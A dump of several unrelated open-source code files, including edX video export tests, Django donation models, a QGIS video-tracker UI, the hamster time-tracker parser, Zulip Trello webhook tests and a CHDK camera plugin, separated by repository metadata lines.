show_captions="false"
from="1.0"
to="60.0">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
video = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(video, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
class VideoExportTestCase(unittest.TestCase):
"""
Make sure that VideoDescriptor can export itself to XML
correctly.
"""
def assertXmlEqual(self, expected, xml):
for attr in ['tag', 'attrib', 'text', 'tail']:
self.assertEqual(getattr(expected, attr), getattr(xml, attr))
for left, right in zip(expected, xml):
self.assertXmlEqual(left, right)
def test_export_to_xml(self):
"""Test that we write the correct XML on export."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
desc.youtube_id_0_75 = 'izygArpw-Qo'
desc.youtube_id_1_0 = 'p2Q6BrNhdh8'
desc.youtube_id_1_25 = '1EeWXzPdhSA'
desc.youtube_id_1_5 = 'rABDYkeK0x8'
desc.show_captions = False
desc.start_time = datetime.timedelta(seconds=1.0)
desc.end_time = datetime.timedelta(seconds=60)
desc.track = 'http://www.example.com/track'
desc.download_track = True
desc.html5_sources = ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg']
desc.download_video = True
xml = desc.definition_to_xml(None) # We don't use the `resource_fs` parameter
expected = etree.fromstring('''\
<video url_name="SampleProblem1" start_time="0:00:01" youtube="0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8" show_captions="false" end_time="0:01:00" download_video="true" download_track="true">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
''')
self.assertXmlEqual(expected, xml)
def test_export_to_xml_empty_end_time(self):
"""Test that we write the correct XML on export."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
desc.youtube_id_0_75 = 'izygArpw-Qo'
desc.youtube_id_1_0 = 'p2Q6BrNhdh8'
desc.youtube_id_1_25 = '1EeWXzPdhSA'
desc.youtube_id_1_5 = 'rABDYkeK0x8'
desc.show_captions = False
desc.start_time = datetime.timedelta(seconds=5.0)
desc.end_time = datetime.timedelta(seconds=0.0)
desc.track = 'http://www.example.com/track'
desc.download_track = True
desc.html5_sources = ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg']
desc.download_video = True
xml = desc.definition_to_xml(None) # We don't use the `resource_fs` parameter
expected = etree.fromstring('''\
<video url_name="SampleProblem1" start_time="0:00:05" youtube="0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8" show_captions="false" download_video="true" download_track="true">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
''')
self.assertXmlEqual(expected, xml)
def test_export_to_xml_empty_parameters(self):
"""Test XML export with defaults."""
module_system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
desc = VideoDescriptor(module_system, DictFieldData({}), ScopeIds(None, None, location, location))
xml = desc.definition_to_xml(None)
expected = '<video url_name="SampleProblem1"/>\n'
self.assertEquals(expected, etree.tostring(xml, pretty_print=True))
| agpl-3.0 | -2,360,412,918,190,615,000 | 40.448211 | 226 | 0.556363 | false |
zaffra/Donate | donate/models.py | 1 | 2850 | from django.db import models
from djangotoolbox.fields import ListField
from django.contrib.auth.models import User
class CommonModel(models.Model):
"""
CommonModel contains the common fields most all other
models will use.
"""
# Auto datetime when created
created_datetime = models.DateTimeField(auto_now_add=True)
# Auto updated when models are saved
updated_datetime = models.DateTimeField(auto_now=True)
# Is this model active and usable?
is_active = models.BooleanField(default=True)
class Meta:
# makes this model abstract such that it cannot
# be instantiated into an actual table and only
# useful for model inheritance
abstract = True
class Charity(CommonModel):
"""
A model for storing a Charity.
"""
# charity name
name = models.CharField(max_length=32)
# charity email address
email = models.EmailField()
class Application(CommonModel):
"""
A model for storing a user's Application
"""
# the owner of the application
user = models.ForeignKey(User)
# readable name of the application
name = models.CharField(max_length=32, unique=True)
# unique identifier of the application for URL mapping
slug = models.SlugField(max_length=32, unique=True)
# description of the application
description = models.TextField()
# goal value
goal_value = models.IntegerField()
# unit of the goal value (singular and plural could be
# combined, but I'm taking the easy route and asking
# the user)
goal_units_singular = models.CharField(max_length=32)
goal_units_plural = models.CharField(max_length=32)
# the list of charities supported by the application
charities = ListField()
class Donation(CommonModel):
"""
A model for the donations being made for a particular
application. It tracks the associated application, the
donation amount, and the PayPal payKey for the donation.
Note: Until a donation is complete and successful, the is_active
field will be set to False
"""
# The PayPal payKey associated with this donation. We use
# the payKey to lookup the appropriate donation during all
# PayPal transaction flows.
pay_key = models.CharField(max_length=32)
# The application owning this donation
application = models.ForeignKey(Application)
# The amount of the donation. Handles up to 999.99
amount = models.DecimalField(max_digits=5, decimal_places=2)
class ProgressUpdate(CommonModel):
"""
Used to track the updates to a user's goal. Each instance
will have a date and value associated.
"""
# The application owning this update
application = models.ForeignKey(Application)
# the value of this update set by the owner
value = models.FloatField()
| bsd-3-clause | 7,198,623,145,001,043,000 | 28.081633 | 69 | 0.698947 | false |
cindyyu/kuma | kuma/users/tests/test_helpers.py | 16 | 1105 | import urllib
from hashlib import md5
from django.conf import settings
from nose.tools import eq_, ok_
from . import UserTestCase
from ..helpers import gravatar_url, public_email
class HelperTestCase(UserTestCase):
def setUp(self):
super(HelperTestCase, self).setUp()
self.u = self.user_model.objects.get(username=u'testuser')
def test_default_gravatar(self):
d_param = urllib.urlencode({'d': settings.DEFAULT_AVATAR})
ok_(d_param in gravatar_url(self.u.email),
"Bad default avatar: %s" % gravatar_url(self.u.email))
def test_gravatar_url(self):
self.u.email = '[email protected]'
ok_(md5(self.u.email).hexdigest() in gravatar_url(self.u.email))
def test_public_email(self):
eq_('<span class="email">'
'me@domain.c'
'om</span>', public_email('[email protected]'))
eq_('<span class="email">'
'not.an.emai'
'l</span>', public_email('not.an.email'))
| mpl-2.0 | 7,404,862,897,567,889,000 | 32.484848 | 76 | 0.597285 | false |
sagost/VideoUavTracker | vut_newproject.py | 1 | 8521 | # -*- coding: utf-8 -*-
'''
Video Uav Tracker v 2.0
Replay a video in sync with a gps track displayed on the map.
-------------------
copyright : (C) 2017 by Salvatore Agosta
email : [email protected]
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
INSTRUCTION:
Syncing:
- Create new project
- Select video and .gpx track (1 trkpt per second)
- Identify first couple Frame/GpsTime and select it.
- Push Synchronize
- Push Start
Replay:
- Move on map
- Create associated DB shapefile
- Add POI with associated video frame saved
- Extract frames with associated coordinates for rapid photogrammetry use
'''
import sys
import os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtMultimediaWidgets import QVideoWidget
import resources
class Ui_NewProject(object):
def setupUi(self, NewProject):
NewProject.setObjectName("NewProject")
NewProject.resize(736, 625)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/plugins/Video_UAV_Tracker/icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
NewProject.setWindowIcon(icon)
self.gridLayout_2 = QtWidgets.QGridLayout(NewProject)
self.gridLayout_2.setObjectName("gridLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.video_frame_2 = QVideoWidget(NewProject)
p = self.video_frame_2.palette()
p.setColor(QtGui.QPalette.Window, QtCore.Qt.black)
self.video_frame_2.setPalette(p)
self.video_frame_2.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.video_frame_2.sizePolicy().hasHeightForWidth())
self.video_frame_2.setSizePolicy(sizePolicy)
self.video_frame_2.setStyleSheet("background-color: rgb(0, 0, 0);")
self.video_frame_2.setObjectName("video_frame_2")
self.horizontalLayout.addWidget(self.video_frame_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 15)
self.horizontalSlider = QtWidgets.QSlider(NewProject)
self.horizontalSlider.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSlider.setObjectName("horizontalSlider")
self.gridLayout.addWidget(self.horizontalSlider, 1, 0, 1, 15)
self.replayPlay_pushButton = QtWidgets.QPushButton(NewProject)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.replayPlay_pushButton.sizePolicy().hasHeightForWidth())
self.replayPlay_pushButton.setSizePolicy(sizePolicy)
self.replayPlay_pushButton.setCheckable(False)
self.replayPlay_pushButton.setChecked(False)
self.replayPlay_pushButton.setObjectName("replayPlay_pushButton")
self.gridLayout.addWidget(self.replayPlay_pushButton, 3, 1, 1, 1)
self.replayPosition_label = QtWidgets.QLabel(NewProject)
self.replayPosition_label.setObjectName("replayPosition_label")
self.gridLayout.addWidget(self.replayPosition_label, 3, 4, 1, 1)
self.muteButton = QtWidgets.QToolButton(NewProject)
self.muteButton.setText("")
self.muteButton.setObjectName("muteButton")
self.gridLayout.addWidget(self.muteButton, 3, 2, 1, 1)
self.comboBox = QtWidgets.QComboBox(NewProject)
self.comboBox.setObjectName("comboBox")
self.gridLayout.addWidget(self.comboBox, 3, 14, 1, 1)
self.pushButton_2 = QtWidgets.QPushButton(NewProject)
self.pushButton_2.setObjectName("pushButton_2")
self.gridLayout.addWidget(self.pushButton_2, 3, 12, 1, 1)
self.toolButton_3 = QtWidgets.QToolButton(NewProject)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/plugins/Video_UAV_Tracker/mIconFormSelect.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_3.setIcon(icon1)
self.toolButton_3.setObjectName("toolButton_3")
self.gridLayout.addWidget(self.toolButton_3, 3, 11, 1, 1)
self.toolButton_2 = QtWidgets.QToolButton(NewProject)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionAtlasNext.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_2.setIcon(icon2)
self.toolButton_2.setObjectName("toolButton_2")
self.gridLayout.addWidget(self.toolButton_2, 3, 9, 1, 1)
self.SkipFortoolButton_8 = QtWidgets.QToolButton(NewProject)
self.SkipFortoolButton_8.setStyleSheet("")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionArrowRight.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.SkipFortoolButton_8.setIcon(icon3)
self.SkipFortoolButton_8.setObjectName("SkipFortoolButton_8")
self.gridLayout.addWidget(self.SkipFortoolButton_8, 3, 8, 1, 1)
self.SkipBacktoolButton_7 = QtWidgets.QToolButton(NewProject)
self.SkipBacktoolButton_7.setStyleSheet("")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionArrowLeft.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.SkipBacktoolButton_7.setIcon(icon4)
self.SkipBacktoolButton_7.setObjectName("SkipBacktoolButton_7")
self.gridLayout.addWidget(self.SkipBacktoolButton_7, 3, 7, 1, 1)
self.toolButton = QtWidgets.QToolButton(NewProject)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionAtlasPrev.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton.setIcon(icon5)
self.toolButton.setObjectName("toolButton")
self.gridLayout.addWidget(self.toolButton, 3, 6, 1, 1)
self.pushButton = QtWidgets.QPushButton(NewProject)
self.pushButton.setObjectName("pushButton")
self.gridLayout.addWidget(self.pushButton, 3, 0, 1, 1)
self.gridLayout_2.addLayout(self.gridLayout, 0, 0, 1, 1)
self.retranslateUi(NewProject)
QtCore.QMetaObject.connectSlotsByName(NewProject)
def retranslateUi(self, NewProject):
_translate = QtCore.QCoreApplication.translate
NewProject.setWindowTitle(_translate("NewProject", "Video UAV Tracker - New Project"))
self.replayPlay_pushButton.setText(_translate("NewProject", "Play/Pause"))
self.replayPosition_label.setText(_translate("NewProject", "-:- / -:-"))
self.pushButton_2.setToolTip(_translate("NewProject", "<html><head/><body><p>Synchronize actual video frame with selected GPS time</p></body></html>"))
self.comboBox.setToolTip(_translate("NewProject", "<html><head/><body><p> GPS time</p></body></html>"))
self.pushButton_2.setText(_translate("NewProject", "Synchronize!"))
self.toolButton_3.setToolTip(_translate("NewProject", "<html><head/><body><p>Add point shape database to project</p></body></html>"))
#self.toolButton_3.setText(_translate("NewProject", "DB"))
self.toolButton_2.setToolTip(_translate("NewProject", "<html><head/><body><p>Next second</p></body></html>"))
self.toolButton_2.setText(_translate("NewProject", ">>"))
self.SkipFortoolButton_8.setToolTip(_translate("NewProject", "<html><head/><body><p>Next frame</p></body></html>"))
self.SkipFortoolButton_8.setText(_translate("NewProject", ">"))
self.SkipBacktoolButton_7.setToolTip(_translate("NewProject", "<html><head/><body><p>Previous frame</p></body></html>"))
self.SkipBacktoolButton_7.setText(_translate("NewProject", "<"))
self.toolButton.setToolTip(_translate("NewProject", "<html><head/><body><p>Previous second</p></body></html>"))
self.toolButton.setText(_translate("NewProject", "<<"))
self.pushButton.setToolTip(_translate("NewProject", "<html><head/><body><p>Select video and relative gpx</p></body></html>"))
self.pushButton.setText(_translate("NewProject", "Select Video and GPX"))
| gpl-2.0 | 340,023,915,727,115,900 | 53.273885 | 159 | 0.69804 | false |
projecthamster/hamster | src/hamster/lib/parsing.py | 1 | 2802 | import logging
logger = logging.getLogger(__name__) # noqa: E402
import re
from hamster.lib import datetime as dt
# separator between times and activity
ACTIVITY_SEPARATOR = "\s+"
# match #tag followed by any space or # that will be ignored
# tag must not contain '#' or ','
tag_re = re.compile(r"""
\# # hash character
(?P<tag>
[^#,]+ # (anything but hash or comma)
)
\s* # maybe spaces
# forbid double comma (tag can not be before the tags barrier):
,? # single comma (or none)
\s* # maybe space
$ # end of text
""", flags=re.VERBOSE)
tags_separator = re.compile(r"""
(,{0,2}) # 0, 1 or 2 commas
\s* # maybe spaces
$ # end of text
""", flags=re.VERBOSE)
def parse_fact(text, range_pos="head", default_day=None, ref="now"):
"""Extract fact fields from the string.
Returns found fields as a dict.
Tentative syntax (not accurate):
start [- end_time] activity[@category][,, description][,,]{ #tag}
According to the legacy tests, # were allowed in the description
"""
res = {}
text = text.strip()
if not text:
return res
# datetimes
# force at least a space to avoid matching 10.00@cat
(start, end), remaining_text = dt.Range.parse(text, position=range_pos,
separator=ACTIVITY_SEPARATOR,
default_day=default_day)
res["start_time"] = start
res["end_time"] = end
# tags
# Need to start from the end, because
# the description can hold some '#' characters
tags = []
while True:
# look for tags separators
# especially the tags barrier
m = re.search(tags_separator, remaining_text)
remaining_text = remaining_text[:m.start()]
if m.group(1) == ",,":
# tags barrier found
break
# look for tag
m = re.search(tag_re, remaining_text)
if m:
tag = m.group('tag').strip()
# strip the matched string (including #)
remaining_text = remaining_text[:m.start()]
tags.append(tag)
else:
# no tag
break
# put tags back in input order
res["tags"] = list(reversed(tags))
# description
# first look for double comma (description hard left boundary)
head, sep, description = remaining_text.partition(",,")
res["description"] = description.strip()
remaining_text = head.strip()
# activity
split = remaining_text.rsplit('@', maxsplit=1)
activity = split[0]
category = split[1] if len(split) > 1 else ""
res["activity"] = activity
res["category"] = category
return res
| gpl-3.0 | 7,552,497,756,821,847,000 | 27.591837 | 80 | 0.560314 | false |
ecino/compassion-modules | mobile_app_connector/mappings/wp_post_mapping.py | 3 | 1595 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2019 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo.addons.message_center_compassion.mappings.base_mapping import \
OnrampMapping
class WPPostMapping(OnrampMapping):
ODOO_MODEL = 'wp.post'
MAPPING_NAME = 'mobile_app_wp_post'
CONNECT_MAPPING = {
'Blog': {
'ImageUrl': 'image_url',
'Title': 'name',
'Url': 'url',
'WP_id': 'wp_id',
'Post_type': 'post_type',
},
'Title': 'name',
'ActionText': 'name',
'SortOrder': 'view_order',
'IsAutomaticOrdering': 'is_automatic_ordering',
'OrderDate': 'date',
'Type': 'tile_type',
'SubType': 'tile_subtype'
}
FIELDS_TO_SUBMIT = {
'Blog.ImageUrl': None,
'Blog.Title': None,
'Blog.Url': None,
'Blog.WP_id': None,
'Blog.Post_type': None,
'Title': None,
'ActionDestination': None,
'Type': None,
'SubType': None,
'ActionText': None,
'SortOrder': None,
'IsAutomaticOrdering': None,
'OrderDate': None,
}
CONSTANTS = {
'ActionDestination': 'Stories and prayer with relevant blog at '
'the top'
}
| agpl-3.0 | 6,705,988,417,673,983,000 | 28 | 78 | 0.477116 | false |
hackerkid/zulip | zerver/webhooks/trello/tests.py | 4 | 9453 | from typing import Dict
from unittest.mock import patch
import orjson
from zerver.lib.test_classes import WebhookTestCase
class TrelloHookTests(WebhookTestCase):
STREAM_NAME = "trello"
URL_TEMPLATE = "/api/v1/external/trello?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = "trello"
def test_trello_confirmation_request(self) -> None:
response = self.client_head(self.build_webhook_url())
self.assertEqual(response.status_code, 200, response)
def test_trello_webhook_when_card_was_moved_to_another_list(self) -> None:
expected_message = "TomaszKolek moved [This is a card.](https://trello.com/c/r33ylX2Z) from Basics to Intermediate."
self.check_webhook("changing_cards_list", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_renamed(self) -> None:
expected_message = 'TomaszKolek renamed the card from "Old name" to [New name](https://trello.com/c/r33ylX2Z).'
self.check_webhook("renaming_card", "Welcome Board", expected_message)
def test_trello_webhook_when_label_was_added_to_card(self) -> None:
expected_message = 'TomaszKolek added a green label with "text value" to [Card name](https://trello.com/c/r33ylX2Z).'
self.check_webhook("adding_label_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_label_was_removing_from_card(self) -> None:
expected_message = 'TomaszKolek removed a green label with "text value" from [New Card](https://trello.com/c/r33ylX2Z).'
self.check_webhook("removing_label_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_added_to_card(self) -> None:
expected_message = (
"TomaszKolek added TomaszKolek to [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("adding_member_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_removed_from_card(self) -> None:
expected_message = (
"TomaszKolek removed Trello from [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("removing_member_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_set(self) -> None:
expected_message = "TomaszKolek set due date for [Card name](https://trello.com/c/9BduUcVQ) to 2016-05-11 10:00:00 UTC."
self.check_webhook("setting_due_date_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_changed(self) -> None:
expected_message = "TomaszKolek changed due date for [Card name](https://trello.com/c/9BduUcVQ) from 2016-05-11 10:00:00 UTC to 2016-05-24 10:00:00 UTC."
self.check_webhook("changing_due_date_on_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_removed(self) -> None:
expected_message = (
"TomaszKolek removed the due date from [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("removing_due_date_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_archived(self) -> None:
expected_message = "TomaszKolek archived [Card name](https://trello.com/c/9BduUcVQ)."
self.check_webhook("archiving_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_reopened(self) -> None:
expected_message = "TomaszKolek reopened [Card name](https://trello.com/c/9BduUcVQ)."
self.check_webhook("reopening_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_created(self) -> None:
expected_message = "TomaszKolek created [New card](https://trello.com/c/5qrgGdD5)."
self.check_webhook("creating_card", "Welcome Board", expected_message)
def test_trello_webhook_when_attachment_was_added_to_card(self) -> None:
expected_message = "TomaszKolek added [attachment_name](http://url.com) to [New card](https://trello.com/c/xPKXoSTQ)."
self.check_webhook("adding_attachment_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_checklist_was_added_to_card(self) -> None:
expected_message = "TomaszKolek added the Checklist checklist to [New card](https://trello.com/c/xPKXoSTQ)."
self.check_webhook("adding_checklist_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_check_item_is_checked(self) -> None:
expected_message = "Eeshan Garg checked **Tomatoes** in **Checklist** ([Something something](https://trello.com/c/R2thJK3P))."
self.check_webhook("check_item_on_card_checklist", "Zulip", expected_message)
def test_trello_webhook_when_check_item_is_unchecked(self) -> None:
expected_message = "Eeshan Garg unchecked **Tomatoes** in **Checklist** ([Something something](https://trello.com/c/R2thJK3P))."
self.check_webhook("uncheck_item_on_card_checklist", "Zulip", expected_message)
def test_trello_webhook_when_member_was_removed_from_board(self) -> None:
expected_message = (
"TomaszKolek removed Trello from [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("removing_member_from_board", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_added_to_board(self) -> None:
expected_message = (
"TomaszKolek added Trello to [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("adding_member_to_board", "Welcome Board", expected_message)
def test_trello_webhook_when_list_was_added_to_board(self) -> None:
expected_message = (
"TomaszKolek added New list list to [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("adding_new_list_to_board", "Welcome Board", expected_message)
def test_trello_webhook_when_comment_was_added_to_card(self) -> None:
expected_message = "TomaszKolek commented on [New card](https://trello.com/c/xPKXoSTQ):\n~~~ quote\nNew comment\n~~~"
self.check_webhook("adding_comment_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_board_was_renamed(self) -> None:
expected_message = "TomaszKolek renamed the board from Welcome Board to [New name](https://trello.com/b/iqXXzYEj)."
self.check_webhook("renaming_board", "New name", expected_message)
def verify_post_is_ignored(self, payload: str) -> None:
with patch("zerver.webhooks.trello.view.check_send_webhook_message") as m:
result = self.client_post(self.url, payload, content_type="application/json")
self.assertFalse(m.called)
self.assert_json_success(result)
def test_trello_webhook_when_card_is_moved_within_single_list_ignore(self) -> None:
payload = self.get_body("moving_card_within_single_list")
self.verify_post_is_ignored(payload)
def test_trello_webhook_when_board_background_is_changed_ignore(self) -> None:
payload = self.get_body("change_board_background_image")
self.verify_post_is_ignored(payload)
def test_ignored_card_actions(self) -> None:
"""
Certain card-related actions are now ignored solely based on the
action type, and we don't need to do any other parsing to ignore
them as invalid.
"""
actions = [
"copyCard",
"createCheckItem",
"updateCheckItem",
"updateList",
]
for action in actions:
data = dict(
model="whatever",
action=dict(
type=action,
),
)
payload = orjson.dumps(data).decode()
self.verify_post_is_ignored(payload)
def test_ignoring_card_updates(self) -> None:
fields = [
"cover",
"dueComplete",
"idAttachmentCover",
"pos",
]
for field in fields:
card: Dict[str, object] = {}
old = {}
old[field] = "should-be-ignored"
data = dict(
model="whatever",
action=dict(
type="updateCard",
data=dict(card=card, old=old),
),
)
payload = orjson.dumps(data).decode()
self.verify_post_is_ignored(payload)
def test_trello_webhook_when_description_was_added_to_card(self) -> None:
expected_message = "Marco Matarazzo set description for [New Card](https://trello.com/c/P2r0z66z) to:\n~~~ quote\nNew Description\n~~~"
self.check_webhook("adding_description_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_description_was_removed_from_card(self) -> None:
expected_message = (
"Marco Matarazzo removed description from [New Card](https://trello.com/c/P2r0z66z)."
)
self.check_webhook("removing_description_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_description_was_changed_on_card(self) -> None:
expected_message = "Marco Matarazzo changed description for [New Card](https://trello.com/c/P2r0z66z) from\n~~~ quote\nNew Description\n~~~\nto\n~~~ quote\nChanged Description\n~~~"
self.check_webhook("changing_description_on_card", "Welcome Board", expected_message)
| apache-2.0 | -2,209,405,371,688,587,800 | 50.655738 | 189 | 0.656617 | false |
jbaiter/spreads | spreadsplug/dev/chdkcamera.py | 2 | 16340 | # -*- coding: utf-8 -*-
import logging
import os
import re
import subprocess
import tempfile
import time
from fractions import Fraction
from itertools import chain
import usb
from jpegtran import JPEGImage
from spreads.vendor.pathlib import Path
from spreads.config import OptionTemplate
from spreads.plugin import DevicePlugin, DeviceFeatures
from spreads.util import DeviceException
class CHDKPTPException(Exception):
pass
class CHDKCameraDevice(DevicePlugin):
""" Plugin for digital cameras running the CHDK firmware.
"""
features = (DeviceFeatures.PREVIEW, DeviceFeatures.IS_CAMERA)
target_page = None
_cli_flags = None
_chdk_buildnum = None
_can_remote = False
_zoom_steps = 0
MAX_RESOLUTION = 0
MAX_QUALITY = 0
@classmethod
def configuration_template(cls):
conf = super(CHDKCameraDevice, cls).configuration_template()
conf.update(
{'sensitivity': OptionTemplate(80, "The ISO sensitivity value"),
'shutter_speed': OptionTemplate(
u"1/25", "The shutter speed as a fraction"),
'zoom_level': OptionTemplate(3, "The default zoom level"),
'dpi': OptionTemplate(300, "The capturing resolution"),
'shoot_raw': OptionTemplate(False, "Shoot in RAW format (DNG)"),
'focus_distance': OptionTemplate(0, "Set focus distance"),
'monochrome': OptionTemplate(
False, "Shoot in monochrome mode (reduces file size)"),
'chdkptp_path': OptionTemplate(
u"/usr/local/lib/chdkptp",
"Path to CHDKPTP binary/libraries"),
})
return conf
@classmethod
def yield_devices(cls, config):
""" Search for usable devices, yield one at a time
:param config: spreads configuration
:type config: spreads.confit.ConfigView
"""
SPECIAL_CASES = {
# (idVendor, idProduct): SpecialClass
(0x4a9, 0x31ef): QualityFix, # not r47, but has the same bug
(0x4a9, 0x3218): QualityFix,
(0x4a9, 0x3223): QualityFix,
(0x4a9, 0x3224): QualityFix,
(0x4a9, 0x3225): QualityFix,
(0x4a9, 0x3226): QualityFix,
(0x4a9, 0x3227): QualityFix,
(0x4a9, 0x3228): QualityFix,
(0x4a9, 0x3229): QualityFix,
(0x4a9, 0x322a): A2200,
(0x4a9, 0x322b): QualityFix,
(0x4a9, 0x322c): QualityFix,
}
for dev in usb.core.find(find_all=True):
cfg = dev.get_active_configuration()[(0, 0)]
ids = (dev.idVendor, dev.idProduct)
is_ptp = (hex(cfg.bInterfaceClass) == "0x6"
and hex(cfg.bInterfaceSubClass) == "0x1")
if not is_ptp:
continue
if ids in SPECIAL_CASES:
yield SPECIAL_CASES[ids](config, dev)
else:
yield cls(config, dev)
def __init__(self, config, device):
""" Set connection information and try to obtain target page.
:param config: spreads configuration
:type config: spreads.confit.ConfigView
:param device: USB device to use for the object
:type device: `usb.core.Device <http://github.com/walac/pyusb>`_
"""
self.logger = logging.getLogger('ChdkCamera')
self._usbport = (device.bus, device.address)
self._serial_number = (
usb.util.get_string(device, 256, device.iSerialNumber)
.strip('\x00'))
self.logger.debug("Device has serial number {0}"
.format(self._serial_number))
self.config = config
self._cli_flags = []
self._cli_flags.append("-c-d={1:03} -b={0:03}".format(*self._usbport))
self._cli_flags.append("-eset cli_verbose=2")
self._chdk_buildnum = (self._execute_lua("get_buildinfo()",
get_result=True)
["build_revision"])
# PTP remote shooting is available starting from SVN r2927
self._can_remote = self._chdk_buildnum >= 2927
self._zoom_steps = self._execute_lua("get_zoom_steps()",
get_result=True)
try:
self.target_page = self._get_target_page()
except:
self.target_page = None
# Set camera to highest quality
self._execute_lua('exit_alt(); set_config_value(291, 0);'
'enter_alt();')
self.logger = logging.getLogger('ChdkCamera[{0}]'
.format(self.target_page))
def connected(self):
def match_serial(dev):
serial = (
usb.util.get_string(dev, 256, dev.iSerialNumber)
.strip('\x00'))
return serial == self._serial_number
# Check if device is still attached
unchanged = usb.core.find(bus=self._usbport[0],
address=self._usbport[1],
custom_match=match_serial) is not None
if unchanged:
return True
new_device = usb.core.find(idVendor=0x04a9, # Canon vendor ID
custom_match=match_serial)
if new_device is None:
return False
self._usbport = (new_device.bus, new_device.address)
self._cli_flags[0] = ("-c-d={1:03} -b={0:03}".format(*self._usbport))
return True
def set_target_page(self, target_page):
""" Set the device target page.
:param target_page: The target page name
:type target_page: unicode in (u"odd", u"even")
"""
tmp_handle = tempfile.mkstemp(text=True)
os.write(tmp_handle[0], target_page.upper()+"\n")
self._run("upload {0} \"OWN.TXT\"".format(tmp_handle[1]))
self.target_page = target_page
os.remove(tmp_handle[1])
def prepare_capture(self, path):
shoot_monochrome = self.config['monochrome'].get(bool)
# Try to go into alt mode to prevent weird behaviour
self._execute_lua("enter_alt()")
# Try to put into record mode
try:
self._run("rec")
except CHDKPTPException as e:
self.logger.debug(e)
self.logger.info("Camera already seems to be in recording mode")
self._set_zoom(int(self.config['zoom_level'].get()))
# Disable ND filter
self._execute_lua("set_nd_filter(2)")
self._set_focus()
